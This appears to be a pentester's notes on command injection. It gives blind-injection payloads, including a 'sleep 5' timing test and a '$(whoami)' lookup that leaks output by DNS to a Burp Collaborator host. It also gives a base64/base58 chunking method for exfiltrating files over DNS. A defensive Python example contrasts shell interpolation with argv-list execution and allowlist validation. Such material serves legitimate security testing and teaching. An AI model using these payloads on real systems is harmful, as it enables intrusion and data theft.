What is Command Injection?

Command injection is a security vulnerability that allows attackers to execute arbitrary commands on the host system through a vulnerable application. It happens when user input is not properly validated and is passed directly to a system shell (e.g., Bash, CMD, PowerShell), so shell metacharacters in the input are interpreted as additional commands, potentially compromising the system.


Exploitation

Normal


----------------------------------------------------------------------------------
Blind (Simple) BEST FOR PoC

parameter=anything;sleep 5                     ---> Sleep 5 Seconds

or

parameter=anything;$(whoami).burp-collab.com   ---> Return USER.burp-collab.com

- *URL encode* (don't forget to URL-encode the payload)

Using DNS, you get a callback on your Burp Collaborator with the output of the whoami command as a subdomain.
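As an added defender's example (not part of the original notes): the same `parameter=anything;COMMAND` input against a Python handler that interpolates it into a shell string, beside a handler that passes an argv list (no shell) and one that additionally validates against a hostname allowlist. The `echo INJECTED` marker stands in for `sleep 5`/`whoami`, and the `lookup_*` names are constructed for this illustration.

```python
import re
import subprocess

# Constructed payload in the shape the notes use (parameter=anything;COMMAND),
# with a harmless marker command in place of sleep/whoami.
PAYLOAD = "anything;echo INJECTED"

# Hostname allowlist: letters, digits, dots and hyphens only. Shell
# metacharacters (; | & $ ( ) ` newline) never pass this check.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def lookup_vulnerable(target: str) -> str:
    """Interpolates untrusted input into a shell string. The ';' terminates
    the intended command and the remainder runs as a second command."""
    cmd = f"echo resolving {target}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def lookup_no_shell(target: str) -> str:
    """Passes an argv list with shell=False (the default): the input is a
    single literal argument, so ';' and '$(...)' have no special meaning."""
    out = subprocess.run(["echo", "resolving", target],
                         capture_output=True, text=True)
    return out.stdout


def accepts(target: str) -> bool:
    """Allowlist check applied before the input reaches any command."""
    return HOSTNAME_RE.fullmatch(target) is not None


def lookup_hardened(target: str) -> str:
    """Defence in depth: reject anything outside the allowlist, then still
    avoid the shell."""
    if not accepts(target):
        raise ValueError(f"rejected input: {target!r}")
    return lookup_no_shell(target)


def injected(output: str) -> bool:
    """True when the marker command ran as its own command (its own line)."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    print("vulnerable :", repr(lookup_vulnerable(PAYLOAD)))   # marker on own line
    print("no shell   :", repr(lookup_no_shell(PAYLOAD)))     # payload kept literal
    print("allowlist  :", accepts(PAYLOAD), accepts("example.com"))
```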

----------------------------------------------------------------------------------
Blind (Extreme) DNS Data Exfiltration | EXTRACTING FILES

The same principle applies here, but the file must first be base64-encoded and the base64 output then base58-encoded (base64 uses three characters that are not valid in domain names). After that, split the base58 output into chunks of around 60 characters (the limit is 63 characters per DNS label) and send them to the server one by one. Make sure to remove any duplicates before decoding. Finally, decode the base58 and then the base64 to retrieve the original file content.

- The target needs to have base58 installed; otherwise use a Python script
- *Base64 encode your payload* & URL encode it

parameter=anything;PAYLOAD

Example ---> https://www.youtube.com/watch?v=o7oVWXw4t5E